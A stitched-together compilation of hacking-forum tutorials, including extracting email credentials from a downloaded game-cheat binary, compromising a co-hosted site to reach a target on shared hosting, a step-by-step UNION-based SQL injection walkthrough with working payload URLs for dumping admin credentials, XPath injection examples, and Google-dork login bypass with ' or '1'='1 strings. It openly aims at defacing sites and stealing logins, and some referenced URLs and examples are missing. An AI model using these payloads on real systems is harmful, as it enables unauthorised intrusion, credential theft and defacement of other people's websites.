Hack a Gmail Account Easily. {Guaranteed Hack}

Okay I will make the Tutorial Short and Clear. For this I'll Explain you STEP by STEP.

-Go to Youtube

-Search "Runescape Hacker" or "Runescape Hacker Download Link"

-Find the Download Link (They are usually in the comments Section.)

-Download the Runescape Hacker Tool.

-Don't open the Runescape Hacker Tool, It may be Backd00red Instead place it in a Separate Area.

-Download HexWorshop. Google it and you will Find the Link.

-Install HexWorkshop.

-Now go to the downloaded RunescapeHacker Phile and Right Click on it !

-Now You Will see something like "Edit this with HexWorkshop" Click It !

-Now you will see the HexWorkshop Screenie. Do Nothing, You will Feel confused for the First time But Believe it's Easy.

-Just go to the Edit on the Top and Find a Button "Find"

-When you get 'Find", Click on it !

-Now Before start Finding Anything Make sure you change the "Hex" to "String" value.

-Now Enter "Gmail" to the Box and Hit "Find".

-You will Get Popping Up a Black area. Don't touch it. Instead see on your Right for the Texts.

-Copy the Highlighted text and Paste it in a Text document (Newly Created).

-Remove the [.]>DOTs and You will see The Email ID + the Passwd.

Hope you Enjoy my Stuffs.


Sometimes site that is your TARGET just isn't hackable. Even Acunetix Web Security Scanner can't find useful vulnerability. In that kind of situation the only thing that might work is to hack site (backdoor site) that is on same server and through that site and through server to penetrate the site.

Tools required:

Finding Backdoor Site

To find backdoor site go to
and in Whois Lookup enter your TARGET site

As a result you'll get Whois Record

Look for Reverse IP
In our case 25 other sites hosted on this server.
Click on it to see names of the hosted sites on the same server.

You will see few of them, to see all, click on more...

To see them all you must be a member.
You can easily Sign up for a FREE account by cicking on Create an Account
(use some anonymous email service for that)
As a member you can see all 25 other sites hosted on that server.

Hacking Backdoor Site
Here we have 25 potentional backdoor sites and our target one.
Let's say after analysing we find that our backdoor sites No17 (as example) and target No22
Backdoor site can be any one from the list who can be hacked and sell uploaded 

Penetrate Target Site
By cicking on var/ at www.backdoorsite.com we go straight to root of the server

Where we can find our www.target.com dir.
Sometimes premisions isn't drwx but dr-x which is more then enough to read configuration file

With data from that file we can hack unhackable site..

SQL Injection Tutorial! 100% NOOB FRIENDLY

SQL Injection Tutorial! 100% NOOB FRIENDLY!! No Previous Hacking Knowledge Needed

SQL Injection

Hi, this thread covers all your basic SQL Injection needs. After reading this, you should be able to successfully retrieve Database information such as the username and password that are crucial for defacing sites.

Lets start.

What is SQL Injection?
is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

Step 1: Choose Your Target:
Of course, you can't SQL Inject nothing. You must have a website as a target. Remember, only vulnerabl sites are able to be injected into. You can't just SQL Inject any site *sigh*.

So how do we see which sites are vulnerable? There are many lists of vulnerable sites out there. But if you wish to find them manually, read on.
Wtf is this? These are "Dorks" that you can use to find vulnerable sites. Go to Google and simply copy and paste one of those dorks and click search.

I personally recommend going here (scanner seems to be down) to see which sites are vulnerable, but if you wish to do THAT manually also, read on. If not, skip to Step 2.

After you have Googled the dorks, click on any site.

To check the site for vulnerability, simply add a "'" to the end of the URL (without the quotes). It should look somewhat like this:


If the page simply refreshes, the site is not vulnerable. But if an error of any kind pops up, the site is prone to SQLi. When you have successfully found a vulnerable site, proceed to Step 2.

Step 2: Find the Vulnerable Column
Now that we found our vulnerable site, we will need to find the vulnerable columns.

Add this to the end of the URL:

http://www.sitename.com/main.php?id=232 order by 1--

Now here's where it gets tougher (not really). You have to look for errors as you enter new numbers. For example:

http://www.sitename.com/main.php?id=232 order by 1-- (no error)
http://www.sitename.com/main.php?id=232 order by 2-- (no error)
http://www.sitename.com/main.php?id=232 order by 10-- (ERROR!)
http://www.sitename.com/main.php?id=232 order by 5-- (no error)
http://www.sitename.com/main.php?id=232 order by 6-- (ERROR!)

The goal here is to find the least column the shows the error. As you can see in the example, the lowest column that we found an error on is column 6, therefore, column 6 doesn't exist and there are only 5 columns.

Now we have to find which one of these five columns (it may be different in your case) is vulnerable, to do that, add this code to the end of the URL:

http://www.sitename.com/main.php?id=-232 union select 1,2,3,4,5--

Make sure to include the - in the beginning and the -- at the end, this is crucial. Remember that the code above may be different in your case regarding how many columns there are.

Now, if you see numbers on the screen. You can proceed. The very first number is the number of the vulnerable column. If the number is "4" that means that the 4th column is the vulnerable column.
Step 3: Obtain Version Number and Database Name
That vulnerable column is the ONLY column that we will be editing.

Assuming that the vulnerable column is 4 (it may be different in your case), proceed to find the version number. To find the version number, replace the vulnerable column with "@@version" like this:

http://www.sitename.com/main.php?id=-232 union select 1,2,3,@@version,5--

If the version is 5 or above, proceed. If not, it will be harder to hack. There are other tutorials covering how to hack database versions 4 or lower.

Now we must find the database name. To do this, replace the "@@version" from before with "concat(database())" like this:

http://www.sitename.com/main.php?id=-232 union select 1,2,3,concat(database()),5--

And BOOM! The database name should appear on your screen. Copy this somewhere safe, we will need this for later.
Step 4: Obtain Table Names

We are almost done, don't give up just yet.

Now we have to find the table names. This is crucial because the tables contain all of the information that we may need. Some hackers look for credit card information and e-mail adresses, but in this tutorial we will be looking to retrieve the username and password in order to deface the site.

Edit the code as follows:

http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema=database()--

Now, names appear. Look for obvious names hinting to tables where user information can be stored. You are looking for table names such as "Admin", "Users", "Members", "Admin_Id", Admin_pass", "User_id", etc..

The last character is chopped off? Don't worry. Count how many tables you can see, then add this code based on the tables that you can see. We will be assuming that the last table you can see is the 8th table.

http://www.sitename.com/main.php?id=-232 union select 1,2,3,table_name,5 from information_schema.tables where table_schema=database() limit 8,1--

This code is to view the 9th table. Replace the 8 with a 9 to view the 10th table, and so on until you find the table that you think has the most crucial information.

When you find the table, copy the name somewhere safe. We will need both the database and table names for the next step.

For this tutorial, we will be using the table name of "admin".
Step 5: View the Columns, and Find the Crucial Shit
Here comes the fun part :3

To find the column names, add this to the end of the URL:

http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name="admin"--

Didju get an error? OH NO! YOU FAIL. Choose another site. Just kidding.
Go here and type in your table name where is says "Say Hello to My Little Friend".

In my case, this is the string that I got after I inputted "admin" to the input space:


Now, replace the table name with hex as so:

http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name=0x61646d696e--

Notice how I added the "0x", that is to indicate that hex is being used. Remember to get rid of the quotes.

Now after you enter this code, you should see where all the juicy information is contained. An example of what you should see is:

Admin_Username, Admin_Pass, Admin_credentials, User_credentials, Members, etc..

Now say you want to view what is in the "Admin_Username" and the "Admin_pass", add this code (in this example we will be using "database" as the database name and "admin" for the table name):

http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(Admin_Username,0x3a,Admin_Pass),5 FROM database.admin--

The "0x3a" will put a colon to where the information will be separated. You should get something like this:


The username is "MyName" and the password is.. WAIT! That is MD5, crack this using Havij 0r U can decrypt online md5 cracker(www.crypo.com) .

Now as you can see. This is the login info:

Username: MyName
Pass: 123456

Now all you have to do is find the admin page, which is usually

or something similar. There are tools online that will find you the admin page.

Hack Websites Database Using XPath Injection

Before we go deeper into XPATH injection lets take a brief look at what XML and XPath.

What is XML?
XML stands for Extensible Markup Language and was designed or used to describe data. It provide platform for programmers to create their own customized tags to store data on database server. An XML document is mostly similar to an RDBMS Database except for the way data is stored in them. In case of a normal database, data is stored in a table rows and columns and in XML the data is stored in nodes in a tree form.

What is XPath?
XPath is a query language used to select data from XML data sources. It is increasingly common for web applications to use XML data files on the back-end, using XPath to perform queries much the same way SQL would be used against a relational database.
XPath injection, much like SQL injection, exists when a malicious user can insert arbitrary XPath code into form fields and URL query parameters in order to inject this code directly into the XPath query evaluation engine. Doing so would allow a malicious user to bypass authentication (if an XML-based authentication system is used) or to access restricted data from the XML data source.

Lets learn with the help of examples that will show how XPath works, Let's assume that our database is represented by the following XML file:

The above code show how username,password and user account details stored in XML file.

Following XPath query is used to returns the account whose username is "bdrockz" and the password is "123" : ,

If the application developer does not properly filter user input, the tester or hacker will be easily able to inject XPath code and interfere with the query result. For instance, the hacker or tester could input the following values:

Username: ' or '1' = '1
Password: ' or '1' = '1

Using these above parameters, the query becomes:

As in most of the common SQL Injection attack, we have created a query that always evaluates to true, which means that the application will authenticate the user even if a username or a password have not been provided.

And as in a common SQL Injection attack, with XPath injection, the first step is to insert a single quote (') in the field to be tested, introducing a syntax error in the query, and to check whether the application returns an error message.

If there is no knowledge about the XML data internal details and if the application does not provide useful error messages that help us reconstruct its internal logic, it is possible to perform a Blind XPath Injection attack(i will explain that in next tutorials), whose goal is to reconstruct the whole data structure. The technique is similar to inference based SQL Injection, as the approach is to inject code that creates a query that returns one bit of information.

That’s it.

So friends, I hope you will like this
XPath Injection Tutorial For Website Hacking....

Hack Website Using Simple SQL Injection Tutorial

You might seen websites hacked by hackers. When I dont know about these hacks I think it is very technical. But it is quite simple. Sometimes hacking website is quite like eating a banana (lol).So lets start the tutorial.

In this tutorial I will be showing you a very basic and simply SQLi (Structured Query Language Injection).I will show you how to get into a website by using some google dorks and SQL query. By using SQL queries we can bypass the username and password and can enter into the admin panel. To hack a website simply follow these steps :-

> Use any of the google dork to find the admin login page of a website.

intitle:admin login
inurl:adminlogin.asp inurl:adminlogin.php

There are many websites which can be hacked by this. Open anyone and you will see the login page. Type this SQL query in form.

Username : 1'or'1'='1
Password : 1'or'1'='1

Note : This is only for educational purposes. I am not responsible for any damage done by anyone.
If the site is vulnerable to this you will get into the admin panel. If it dont work then try other sites.